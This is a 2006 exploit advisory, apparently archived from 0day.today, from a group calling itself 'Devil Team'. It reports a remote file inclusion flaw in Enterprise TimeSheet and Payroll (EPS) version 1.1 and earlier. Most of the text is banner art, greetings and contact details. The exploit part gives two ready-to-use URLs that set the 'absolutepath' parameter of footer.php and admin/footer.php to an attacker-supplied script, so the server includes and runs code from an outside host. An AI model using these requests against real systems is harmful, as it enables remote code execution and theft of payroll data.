id: 501
date: 06/07/2006
title: Enterprise Payroll Systems <= 1.1 (footer) Remote Include Vulnerability
author: Kacper
cves: 

=======================================================================
Enterprise Payroll Systems <= 1.1 (footer) Remote Include Vulnerability
=======================================================================




$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  Enterprise TimeSheet and Payroll (EPS) <= v.1.1 Remote File Include Vulnerability
$$  Script site: http://epayroll.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:


http://www.site.com/[EPS_path]/footer.php?absolutepath=[evil_scripts]

http://www.site.com/[EPS_path]/admin/footer.php?absolutepath=[evil_scripts]


#Pozdro dla wszystkich ;-)



#  0day.today [2023-03-22]  #